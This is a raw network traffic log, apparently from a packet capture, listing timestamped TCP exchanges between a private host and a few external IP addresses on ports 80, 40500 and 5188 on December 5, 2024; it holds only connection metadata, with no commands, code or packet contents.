Dec 5, 2024 17:32:06.067338943 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.067492962 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.067532063 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.068520069 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.068567991 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.068703890 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.068738937 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.069721937 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.069766998 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.069797993 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.069963932 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.070944071 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.070981979 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.071115971 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.071156025 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.072164059 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.072206974 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.072374105 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.072412968 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.073338985 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.073380947 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.073457003 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.073494911 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.074551105 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.074593067 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.074681044 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.074717999 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.075790882 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.075822115 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.075845003 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.075865984 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.076965094 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.076991081 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.077001095 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.077022076 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.078212023 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.078253031 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.078305006 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.078340054 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.079402924 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.079442978 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.079514980 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.079552889 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.080657959 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.080694914 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.080758095 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.080790997 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.081899881 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.081943035 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.082052946 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.082091093 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.083082914 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.083125114 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.083164930 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.083197117 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.160809994 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.197113037 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.197165966 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.197179079 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.197212934 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.197681904 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.197721004 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.197812080 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.197845936 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.198801041 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.198843956 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.198873043 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.198909044 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.199965000 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.200005054 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.215140104 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.215161085 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.215192080 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.215205908 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:06.215648890 CET	80	49775	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:06.215689898 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:07.374361992 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:07.374403000 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:07.374416113 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:07.374435902 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:07.374459982 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:07.374479055 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:07.374512911 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:07.374541044 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:07.374552965 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:07.374584913 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:07.374667883 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:07.374680042 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:07.374692917 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:07.374713898 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:07.374728918 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:07.441659927 CET	49775	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:08.111939907 CET	49757	40500	192.168.2.11	109.68.122.14
Dec 5, 2024 17:32:08.275528908 CET	40500	49757	109.68.122.14	192.168.2.11
Dec 5, 2024 17:32:10.096770048 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:10.216712952 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:10.218445063 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:10.218511105 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:10.338282108 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:11.556622982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:11.586393118 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:11.707461119 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:11.731762886 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:11.855422974 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:11.855519056 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:11.855722904 CET	49793	80	192.168.2.11	185.215.113.84
Dec 5, 2024 17:32:11.975652933 CET	80	49793	185.215.113.84	192.168.2.11
Dec 5, 2024 17:32:12.041395903 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.050137997 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.170111895 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.503911018 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.505728006 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.505755901 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.505768061 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.505812883 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.505858898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.505871058 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.505881071 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.505893946 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.505898952 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.505959034 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.506071091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.506123066 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.514744043 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.514837980 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.514897108 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.522767067 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.522921085 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.523061037 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.624161005 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.625621080 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.673207045 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.697736979 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.697830915 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.697882891 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.701637983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.701853037 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.701925039 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.709714890 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.709860086 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.710105896 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.717691898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.717773914 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.717834949 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.725720882 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.725820065 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.725877047 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.733740091 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.733817101 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.733882904 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.741714001 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.741755009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.741890907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.749711990 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.749800920 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.749849081 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.757855892 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.757869959 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.757942915 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.765741110 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.765827894 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.765883923 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.773962021 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.774076939 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.774323940 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.793092966 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.793217897 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.793271065 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.797213078 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.846170902 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.890064001 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.890162945 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.890368938 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.893954039 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.894073009 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.894145012 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.902107954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.902144909 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.902204037 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.910007954 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.910079002 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.910175085 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.918034077 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.918302059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.919833899 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.925728083 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.926033020 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.926081896 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.933448076 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.933721066 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.933780909 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.938302040 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.938411951 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.938502073 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.944109917 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.944219112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.944300890 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.945839882 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.945900917 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.945904016 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.945975065 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.946758986 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.946793079 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.948051929 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.948123932 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.948261976 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.949743986 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.949851990 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.949903965 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.951741934 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.952917099 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.953051090 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.953131914 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.955204010 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.955255032 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.955277920 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.955334902 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.957832098 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.957915068 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.957962990 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.962857962 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.962905884 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.963203907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.963566065 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.963618040 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.963689089 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.963728905 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.967729092 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.967744112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.967793941 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.972028017 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.972083092 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.972137928 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.972491026 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.972599983 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.972668886 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.977437019 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.977519035 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.977590084 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.980325937 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:12.982314110 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.982382059 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.982382059 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:12.983779907 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.987226963 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.987282991 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.987340927 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.992481947 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.992544889 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.992607117 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:12.996903896 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.996984005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:12.997033119 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.001822948 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.001861095 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.001902103 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.016690969 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.016779900 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.016952038 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.019141912 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.019224882 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.019335032 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.024049044 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.024101973 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.024195910 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.028867960 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.070669889 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:13.070755005 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:13.070849895 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:13.074887037 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:13.075015068 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:13.075069904 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:13.075742960 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:13.080338955 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:13.080387115 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:13.080461025 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:13.080483913 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.081793070 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.081897974 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.083760977 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.084161997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.084326982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.087762117 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.088737965 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:13.088793039 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:13.089008093 CET	80	49781	185.215.113.66	192.168.2.11
Dec 5, 2024 17:32:13.089066029 CET	49781	80	192.168.2.11	185.215.113.66
Dec 5, 2024 17:32:13.089098930 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.089112997 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.089168072 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.093656063 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.093719006 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.093770981 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.098608017 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.098649025 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.098706961 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.103229046 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.103367090 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.103434086 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.107429028 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.107559919 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.107611895 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.111660957 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.111818075 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.111869097 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.115365982 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.115505934 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.115614891 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.119246960 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.119376898 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.119457960 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.122904062 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.122967005 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.123039961 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.126480103 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.126585007 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.126630068 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.128243923 CET	49799	40500	192.168.2.11	176.67.79.229
Dec 5, 2024 17:32:13.129906893 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.130048990 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.130100012 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.133433104 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.133728027 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.133830070 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.136789083 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.136900902 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.136967897 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.140183926 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.140280008 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.140342951 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.143773079 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.143958092 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.144058943 CET	49792	5188	192.168.2.11	92.255.85.66
Dec 5, 2024 17:32:13.147133112 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.147401094 CET	5188	49792	92.255.85.66	192.168.2.11
Dec 5, 2024 17:32:13.147804022 CET	49792	5188	192.168.2.11	92.255.85.66
